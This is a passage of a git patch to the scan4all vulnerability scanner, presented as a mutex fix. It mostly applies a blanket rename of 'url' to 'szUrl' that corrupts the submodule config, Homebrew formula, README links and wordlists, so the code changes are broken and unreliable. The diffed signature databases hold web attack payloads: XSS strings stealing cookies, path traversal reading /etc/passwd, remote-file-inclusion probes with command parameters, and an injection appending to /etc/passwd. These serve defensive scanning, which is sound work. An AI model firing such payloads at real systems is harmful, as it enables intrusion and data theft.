From 44a3376a42f0de4b3c19bc0bd86adb4bfc20d5e2 Mon Sep 17 00:00:00 2001
From: hktalent <18223385+hktalent@users.noreply.github.com>
Date: Wed, 5 Oct 2022 16:08:16 +0800
Subject: [PATCH] fix someMapMutex.Unlock()
 vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go
 2022-10-05

---
 .gitmodules                                   |  4 +-
 HomebrewFormula/scan4all.rb                   |  2 +-
 README.md                                     |  4 +-
 README_CN.md                                  |  2 +-
 brute/dicts/filedic.txt                       | 28 ++++-----
 config/config.json                            |  2 +-
 config/databases/db_dictionary                |  2 +-
 config/databases/db_server_msgs               |  6 +-
 config/databases/db_tests                     | 30 ++++-----
 config/wordlists/headers                      | 60 +++++++++---------
 config/wordlists/parameters                   |  2 +-
 ...ellyfin_Audio_File_read_CVE_2021_21402.txt |  4 +-
 .../JingHe_OA_download.asp_File_read.txt      |  2 +-
 ...pXO_download_File_read_CNVD_2021_15822.txt |  4 +-
 ... OA Arbitrary User Login Vulnerability.txt |  2 +-
 ...TopSec_TopACM_Remote_Command_Execution.txt |  4 +-
 ...hp_arbitrary_file_upload_vulnerability.txt |  4 +-
 lib/goby/goby_pocs/showDocGo.txt              |  4 +-
 lib/util/sv2es.go                             | 63 +++++++------------
 static/NicePwn.md                             |  4 +-
 .../nuclei/v2/pkg/protocols/http/request.go   |  4 +-
 21 files changed, 110 insertions(+), 127 deletions(-)
diff --git a/.gitmodules b/.gitmodules
index 9aef7a590..622d50000 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -1,6 +1,6 @@
 [submodule "nuclei-templates"]
 	path = nuclei-templates
-	url = git@github.com:hktalent/nuclei-templates.git
+	szUrl = git@github.com:hktalent/nuclei-templates.git
 [submodule "config/nuclei-templates"]
 	path = config/nuclei-templates
-	url = http://github.com/hktalent/nuclei-templates
+	szUrl = http://github.com/hktalent/nuclei-templates
diff --git a/HomebrewFormula/scan4all.rb b/HomebrewFormula/scan4all.rb
index 01a3e0d7c..a992dfd15 100644
--- a/HomebrewFormula/scan4all.rb
+++ b/HomebrewFormula/scan4all.rb
@@ -1,7 +1,7 @@
 class Rage < Formula
     desc "Official repository vuls Scan: 15000+PoCs; 23 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port scanning; Fuzz, HW, awesome BugBounty( ͡° ͜ʖ ͡°)..."
     homepage "https://scan4all.51pwn.com"
-    url "https://github.com/hktalent/scan4all/releases/download/2.8.1/scan4all_2.8.1_macOS_amd64.zip"
+    szUrl "https://github.com/hktalent/scan4all/releases/download/2.8.1/scan4all_2.8.1_macOS_amd64.zip"
     sha256 "2af8d9f67bae7c03ef20d064b2f23e7bef4c95f0cf7e1da33cbd42fcceabeb39"
     version "2.8.1"
 
diff --git a/README.md b/README.md
index 12c209933..24d157178 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-[![Tweet](https://img.shields.io/twitter/url/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
+[![Tweet](https://img.shields.io/twitter/szUrl/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
 <p align="center">
    <a href="/README_CN.md">README_中文</a> •
    <a href="/static/Installation.md">Compile/Install/Run</a> •
@@ -149,7 +149,7 @@ where 92.168.0.111 is the target to query
   <a href=https://github.com/hktalent/scan4all/discussions>Using Help</a>
 ```bash
 go build
-# Precise scan url list UrlPrecise=true
+# Precise scan szUrl list UrlPrecise=true
 UrlPrecise=true ./scan4all -l xx.txt
 # Disable adaptation to nmap and use naabu port to scan its internally defined http-related Ports
 priorityNmap=false ./scan4all -tp http -list allOut.txt -v
diff --git a/README_CN.md b/README_CN.md
index 4e28c7faf..dd0f3f2f5 100644
--- a/README_CN.md
+++ b/README_CN.md
@@ -1,4 +1,4 @@
-[![Tweet](https://img.shields.io/twitter/url/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
+[![Tweet](https://img.shields.io/twitter/szUrl/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
 <p align="center">
    <a href="/README.md">README_EN</a> •
    <a href="/static/Installation.md">编译/安装/运行</a> •
diff --git a/brute/dicts/filedic.txt b/brute/dicts/filedic.txt
index 4bab15d42..eaa25c377 100644
--- a/brute/dicts/filedic.txt
+++ b/brute/dicts/filedic.txt
@@ -2134,7 +2134,7 @@ $metadata
 /api/payment?id=
 /api/prod/services
 /api/proxy
-/api/proxy?url=
+/api/proxy?szUrl=
 /api/saved_objects/_find?type=index-pattern&per_page=100
 /api/search
 /api/sessions
@@ -7658,7 +7658,7 @@ api/payment?id=
 api/product/toprank
 api/profile
 api/proxy
-api/proxy?url=
+api/proxy?szUrl=
 api/put
 api/quiet
 api/reload
@@ -15448,9 +15448,9 @@ gotdotnet
 gotemp.php
 gotest.sh
 goto
-gotoURL.asp?url=google.com&id=43569
+gotoURL.asp?szUrl=google.com&id=43569
 goto_step.sh
-gotourl.asp?url=google.com&id=43569
+gotourl.asp?szUrl=google.com&id=43569
 gpg.sh
 gphotos
 gpl.txt
@@ -22706,10 +22706,10 @@ plugins/editors/fckeditor
 plugins/fckeditor
 plugins/filemanager/filemanager/js
 plugins/servlet/gadgets/makeRequest
-plugins/servlet/gadgets/makeRequest?url=https://google.com
+plugins/servlet/gadgets/makeRequest?szUrl=https://google.com
 plugins/servlet/gadgets/makerequest
-plugins/servlet/gadgets/makerequest?url=https
-plugins/servlet/gadgets/makerequest?url=https://google.com
+plugins/servlet/gadgets/makerequest?szUrl=https
+plugins/servlet/gadgets/makerequest?szUrl=https://google.com
 plugins/servlet/oauth/users/icon
 plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload.swf
 plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf
@@ -27943,9 +27943,9 @@ ur-admin/
 urban
 uresk
 uri
-url
-url.jsp
-url.php
+szUrl
+szUrl.jsp
+szUrl.php
 url_1.sql
 url_2.sql
 urlList.
@@ -29929,7 +29929,7 @@ wp-content/plugins/elementor-pro/assets/css/frontend.min.css
 wp-content/plugins/google-sitemap-generator/sitemap-core.php
 wp-content/plugins/hello.php
 wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/util/php/eval-stdin.php
-wp-content/plugins/jrss-widget/proxy.php?url=
+wp-content/plugins/jrss-widget/proxy.php?szUrl=
 wp-content/plugins/master-slider/public/assets/css/masterslider.main.css?ver=2.9.8
 wp-content/plugins/master-slider/public/assets/js/jquery.easing.min.js?ver=2.9.8
 wp-content/plugins/master-slider/public/assets/js/masterslider.min.js?ver=2.9.8
@@ -30040,9 +30040,9 @@ wp-includes/rss-functions.php
 wp-includes/wlwmanifest.xml
 wp-json
 wp-json/
-wp-json/oembed/1.0/embed?url=http:/172.105.71.142
-wp-json/oembed/1.0/embed?url=http:/lovi.studio
-wp-json/oembed/1.0/embed?url=http:/onestopsla.com
+wp-json/oembed/1.0/embed?szUrl=http:/172.105.71.142
+wp-json/oembed/1.0/embed?szUrl=http:/lovi.studio
+wp-json/oembed/1.0/embed?szUrl=http:/onestopsla.com
 wp-json/wp/v2/users
 wp-json/wp/v2/users/
 wp-license.php
diff --git a/config/config.json b/config/config.json
index b733dc30b..473cdb8c0 100644
--- a/config/config.json
+++ b/config/config.json
@@ -73,7 +73,7 @@
   "naabu": {"TopPorts": "1000","ScanAllIPS": true,"Threads": 50,"EnableProgressBar": false},
   "priorityNmap": true,
   "noScan": false,
-  "enableMultNuclei": true,
+  "enableMultNuclei": false,
   "enableNuclei": true,
   "nuclei": {
     "Severities":  [5,4,3],
diff --git a/config/databases/db_dictionary b/config/databases/db_dictionary
index 6c3d9fe75..0d27bb566 100644
--- a/config/databases/db_dictionary
+++ b/config/databases/db_dictionary
@@ -1683,7 +1683,7 @@ upfiles
 upload
 uploader
 uploads
-url
+szUrl
 urls
 us
 usa
diff --git a/config/databases/db_server_msgs b/config/databases/db_server_msgs
index c7e330967..c52dd9745 100644
--- a/config/databases/db_server_msgs
+++ b/config/databases/db_server_msgs
@@ -118,7 +118,7 @@
 "800098","jakarta-tomcat-4.0.1","0","Server will reveal path"
 "800099","JavaWebServer","0","Probably Sun Microsystem's servlet interface. May have default code which is exploitable. Try admin/admin for id/password."
 "800100","JetAdmin","0","HP Printer"
-"800101","Jeus WebContainer\/([0-3]\.[0-2]\..*)","0","JEUS below 3.2.2 is vulnerable to XSS if a nonexistent url is requested, i.e. [victim site]/[javascript].jsp"
+"800101","Jeus WebContainer\/([0-3]\.[0-2]\..*)","0","JEUS below 3.2.2 is vulnerable to XSS if a nonexistent szUrl is requested, i.e. [victim site]/[javascript].jsp"
 "800102","Jigsaw\/([0-1].*|2\.([0-1].*|2\.0))","0","Jigsaw 2.1.0 or below may be vulnerable to XSS if a nonexistent host name is requested, i.e. nosuchhost.domain.com/<script>..."
 "800103","Jigsaw\/2\.2\.1","0","Jigsaw 2.1.1 on Windows may be tricked into revealing the system path by requesting /aux two times."
 "800104","JRun\/([0-3]\..*|4\.0)","0","JRun 4.0 and below on IIS is vulnerable to remote buffer overflow with a filename over 4096. http://www.macromedia.com/v1/handlers/index.cfm?ID=23500 and http://www.eeye.com/html/Research/Advisories/index.html"
@@ -126,7 +126,7 @@
 "800106","KazaaClient","0","Kazaa may allow sensitive information to be retrieved, http://www.securiteam.com/securitynews/5UP0L2K55W.html"
 "800107","LabVIEW\/(5\.[1-9]|6\.[0-1])","0","LabVIEW 5.1.1 to 6.1 is vulnerable to a remote DoS by sending a malformed GET request. This DoS was not attempted."
 "800108","Lasso\/3\.6\.5","0","This version of Blueworld WebData engine is vulnerable to DoS by sending a 1600 character long GET request."
-"800109","LilHTTP\/2\.1","0","LilHTTP server 2.1 allows password protected resources to be retrieved by prepending '/./' to the url."
+"800109","LilHTTP\/2\.1","0","LilHTTP server 2.1 allows password protected resources to be retrieved by prepending '/./' to the szUrl."
 "800110","LocalWeb2000\/([0-1]\.*|2\.(0\.*|1\.0))","0","LocalWeb2000 2.1.0 and below allow protected files to be retrieved by prepending the request with /./"
 "800111","Lotus-Domino\/([0-3].*|4\.([0-1].*|2\.([0-1].*|3)))","0","This version of Lotus-Domino server has had multiple vulnerabilities. See the bugtraq archives for details."
 "800112","Lotus-Domino\/4\.[5-6]","0","This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever. CAN-2003-0123."
@@ -157,7 +157,7 @@
 "800137","myCIO","0","The McAfee myCIO server provides antivirus updates to clients. This server has had multiple vulnerabilities in the past."
 "800138","Mylo/0\.([0-1]|2\.[0-1])","0","mod_mylo may be vulnerable to a remote buffer overflow. Upgrade to the latest version. BID-8287."
 "800139","MyServer 0\.([0-3]\..*|4\.[0-2])","0","MyServer versions lower than 0.5 contain multiple remote vulnerabilities."
-"800140","MyWebServer\/(0\.*|1\.0[0-2])","0","MyWebServer versions 1.02 and below are vulnerable to a DoS by requesting a url of approximately 1000 characters."
+"800140","MyWebServer\/(0\.*|1\.0[0-2])","0","MyWebServer versions 1.02 and below are vulnerable to a DoS by requesting a szUrl of approximately 1000 characters."
 "800141","ncsa","0","lower than v1.3 have multiple issues"
 "800142","neowebscript","0","Apache plugin to allow TCL use"
 "800143","netcloak","0","http://www.maxum.com plugin for webstar"
diff --git a/config/databases/db_tests b/config/databases/db_tests
index d95509bc4..67be825c2 100644
--- a/config/databases/db_tests
+++ b/config/databases/db_tests
@@ -830,7 +830,7 @@
 "000816","32774","4","/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","",""
 "000817","32774","4","/phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","",""
 "000818","27071","4","/phpimageview.php?pic=javascript:alert(8754)","GET","200","alert\(8754\)","","The\sdocument\shas\smoved","","PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).  CA-2000-02.","",""
-"000819","0","4","/phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
+"000819","0","4","/phpclassifieds/latestwap.php?szUrl=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
 "000820","2193","4","/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""
 "000821","4297","4","/phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
 "000822","11145","4","/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
@@ -930,7 +930,7 @@
 "000917","0","4","/admin/login.php?path=\"></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
 "000918","2243","4","/addressbook/index.php?surname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
 "000919","2243","4","/addressbook/index.php?name=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
-"000920","0","4","/add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","",""," 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
+"000920","0","4","/add.php3?szUrl=ja&adurl=javascript:<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","",""," 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
 "000921","0","4","/a?<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.","",""
 "000922","54589","4","/a.jsp/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02.","",""
 "000923","38019","4","/?mod=<script>alert(document.cookie)</script>&op=browse","GET","<script>alert\(document\.cookie\)","","","","","Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
@@ -1475,7 +1475,7 @@
 "001475","2721","7","../../../../../../../../../../etc/*","GET","passwd","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","",""
 "001476","2721","7","../../../../../../../../../../etc/passw*","GET","root:","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","",""
 "001477","2722","7","/bytehoard/index.php?infolder=../../../../../../../../../../../etc/","GET","passwd","","","","","ByteHoard 0.7 is vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher.","",""
-"001478","2723","3","/Search","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","FirstClass 7.1 server allows file listing of any directory by accessing the /Search url.","",""
+"001478","2723","3","/Search","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","FirstClass 7.1 server allows file listing of any directory by accessing the /Search szUrl.","",""
 "001479","2735","d","/musicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/","",""
 "001480","2735","d","@CGIDIRSmusicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/","",""
 "001481","275","3","/scripts/tools/newdsn.exe","GET","200","","","","","This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. BID-1818. CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)","",""
@@ -2460,7 +2460,7 @@
 "002621","3093","1","/tutos/file/file_select.php","GET","200","","","","","This might be interesting:  has been seen in web logs from an unknown scanner.","",""
 "002622","3093","1","@TYPO3typo3/dev/translations.php","GET","200","","","","","This might be interesting:  has been seen in web logs from an unknown scanner.","",""
 "002623","3093","1","/uifc/MultFileUploadHandler.php+","GET","200","","","","","This might be interesting:  has been seen in web logs from an unknown scanner.","",""
-"002624","3093","1","/url.jsp","GET","200","","","","","This might be interesting:  has been seen in web logs from an unknown scanner.","",""
+"002624","3093","1","/szUrl.jsp","GET","200","","","","","This might be interesting:  has been seen in web logs from an unknown scanner.","",""
 "002625","3093","1","/useraction.php3","GET","200","","","","","This might be interesting:  has been seen in web logs from an unknown scanner.","",""
 "002626","3093","1","/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd","GET","root:","","","","","This might be interesting:  has been seen in web logs from an unknown scanner.","",""
 "002627","3093","1","/utils/sprc.asp+","GET","200","","","","","This might be interesting:  has been seen in web logs from an unknown scanner.","",""
@@ -3003,7 +3003,7 @@
 "003221","5092","3","/config.inc","GET","200","","","","","DotBr 0.1 configuration file includes usernames and passwords.","",""
 "003222","5093","3","@CGIDIRSenviron.pl","GET","REMOTE_ADDR","","","","","Sambar Server default script reveals environment information","",""
 "003223","5094","3","@CGIDIRStestcgi.exe","GET","REMOTE_ADDR","","","","","Sambar Server default script reveals environment information","",""
-"003224","5095","3","/sysuser/docmgr/ieedit.stm?url=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
+"003224","5095","3","/sysuser/docmgr/ieedit.stm?szUrl=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
 "003225","5096","3","/sysuser/docmgr/iecreate.stm?template=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
 "003226","5097","4","/wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
 "003227","5098","4","/sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
@@ -3165,7 +3165,7 @@
 "003384","96","7","/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","",""
 "003385","9624","3","/pass_done.php","GET","200","","","","","PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.","",""
 "003386","9624","a","/admin/admin.php?adminpy=1","GET","200","","","","","PY-Membres 4.2 may allow administrator access.","",""
-"003387","0","1","/iishelp/iis/htm/tutorial/redirect.asp","GET","A URL is required","","","","","Possibly unchecked redirect with url= variable.","",""
+"003387","0","1","/iishelp/iis/htm/tutorial/redirect.asp","GET","A URL is required","","","","","Possibly unchecked redirect with szUrl= variable.","",""
 "003388","9695","3","/servlet/SnoopServlet","GET","Client Information","","","","","JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.","",""
 "003389","3268","2","/Citrix/PNAgent/","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","Directory indexing found.","",""
 "003390","3268","2","/Citrix/ICAWEB/","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","Directory indexing found.","",""
@@ -4381,8 +4381,8 @@
 "004603","5292","c","/cron.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "004604","5292","c","/crontab/run_billing.php?config[include_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "004605","5292","c","/crontab/run_billing.php?config[include_dir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
-"004606","5292","c","/cross.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
-"004607","5292","c","/cross.php?url=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
+"004606","5292","c","/cross.php?szUrl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
+"004607","5292","c","/cross.php?szUrl=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "004608","5292","c","/custom_vars.php?sys[path_addon]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "004609","5292","c","/customer/product.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "004610","5292","c","/cwb/comanda.php?INCLUDE_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
@@ -4618,7 +4618,7 @@
 "004843","5292","c","/i_head.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "004844","5292","c","/i_nav.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "004845","5292","c","/iframe.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
-"004846","5292","c","/image.php?url=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
+"004846","5292","c","/image.php?szUrl=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "004847","5292","c","/impex/ImpExData.php?systempath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "004848","5292","c","/import.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "004849","5292","c","/importinfo.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
@@ -4930,7 +4930,7 @@
 "005155","5292","c","/index.php?this_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005156","5292","c","/index.php?txt=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005157","5292","c","/index.php?up=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
-"005158","5292","c","/index.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
+"005158","5292","c","/index.php?szUrl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005159","5292","c","/index.php?w=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005160","5292","c","/index.php?way=@RFIURL??????????????","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005161","5292","c","/index1.php?=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
@@ -5475,7 +5475,7 @@
 "005700","5292","c","/rechnung.php?_PHPLIB[libdir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005701","5292","c","/reconfig.php?GLOBALS[CLPath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005702","5292","c","/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
-"005703","5292","c","/redirect.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
+"005703","5292","c","/redirect.php?szUrl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005704","5292","c","/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005705","5292","c","/register.php?base_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005706","5292","c","/releasenote.php?mosConfig_absolute_path=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
@@ -5617,8 +5617,8 @@
 "005842","5292","c","/sources/Admin/admin_templates.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005843","5292","c","/sources/functions.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005844","5292","c","/sources/help.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
-"005845","5292","c","/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
-"005846","5292","c","/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
+"005845","5292","c","/sources/join.php?FORM[szUrl]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
+"005846","5292","c","/sources/join.php?FORM[szUrl]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005847","5292","c","/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005848","5292","c","/sources/mail.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
 "005849","5292","c","/sources/misc/new_day.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
@@ -6481,10 +6481,10 @@
